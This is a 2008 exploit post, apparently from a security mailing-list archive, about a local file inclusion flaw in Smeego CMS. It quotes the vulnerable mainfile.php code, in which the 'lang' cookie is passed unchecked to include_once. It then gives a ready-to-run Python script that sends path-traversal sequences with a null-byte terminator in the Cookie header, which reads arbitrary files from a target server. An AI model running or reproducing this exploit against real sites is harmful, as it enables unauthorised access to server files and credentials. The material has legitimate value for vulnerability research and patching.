Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability

[SECURITY] [DSA 1580-1] New phpgedview packages fix privilege escalation

Vbulletin 3.7.0 Gold >> Sql injection on faq.php

eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities

From:	0in.email_(at)_gmail.com <0in.email_(at)_gmail.com>
Date:	20.05.2008
Subject:	Smeego CMS vulnerability

# Smeego CMS Local File Include Exploit
#                 by
# 0in from Dark-Coders Programming & Security Group
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<
#--------------------------------------------------------
# Contact: 0in(dot)email[at]gmail(dot)com
#--------------------------------------------------------
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor
#--------------------------------------------------------
# Description:
# Smeego is a Content Management System or Portal
# System written in PHP and designed to be
# easy to install and use. Smeego has a mature code
# and comes with cool modules and themes
# for you to start your own dynamic and database
# driven website. Bla bla Bla [...]
# -------------------------------------------------------
# Script home: http://smeego.com
# -------------------------------------------------------
# Vuln:
#   >>>>>> File: mainfile.php <<<<<<<
#if ($display_errors == 1) {  // We don't se any errors ;(
#  @ini_set('display_errors', 1);
#} else {
#  @ini_set('display_errors', 0);
#}
#
#if (isset($newlang)) {
#
#       if (file_exists("language/lang-".$newlang.".
php")) {
#                setcookie("lang",$newlang,
time()+31536000);
#                include_once("language/lang-".$newlang.".
php");
#                $currentlang = $newlang;
#        } else {
#                setcookie("lang",$language,
time()+31536000);
#                include_once("language/lang-".$language.".
php");
#                $currentlang = $language;
#        }
#} elseif (isset($lang)) {
#
#        include_once("language/lang-".$lang.".php");
#        $currentlang = $lang;
#} else {
#        setcookie("lang",$language,time()+31536000);
#        include_once("language/lang-".$language.".
php");
#        $currentlang = $language;
#}
#      >>>>>> End <<<<<<<
# So.. We can send Cookie: lang=[lfi]

# -------------------------------------------------------

# Simple Python Exploit:

#!/usr/bin/python
import sys
import time
import httplib
print '====================================================='
print '        Smeego CMS Local File INclude Exploit         '
print '                      by                             '
print ' 0in from Dark-Coders Programming & Security Group!  '
print '             http://dark-coders.4rh.eu               '
print '====================================================='
try:
       target=sys.argv[1]
       path=sys.argv[2]
       file=sys.argv[3]
except Exception:
       print '\nUse: %s [target] [path] [file]' % sys.argv[0]
       quit()
i=0
lfi='../'
target+=":80"
special="%00"
file+=special
for i in range(9):
       lfi+="../"
       print '---------------------------------------------------------'
       mysock=httplib.HTTPConnection(target)
       mysock=httplib.HTTPConnection(target)
       mysock.putrequest("GET",path)
       mysock.putheader("User-Agent","Billy Explorer v666")
       mysock.putheader('Accept', 'text/html')
       mysock.putheader('Accept-Language',' en-us,en;q=0.5')
       mysock.putheader('Cookie','lang=%s%s' % (lfi,file))
       mysock.endheaders()
       reply=mysock.getresponse()
       print reply.read()
       time.sleep(2)
       mysock.close()
       print '----------------------------------------------------------'

#EOFF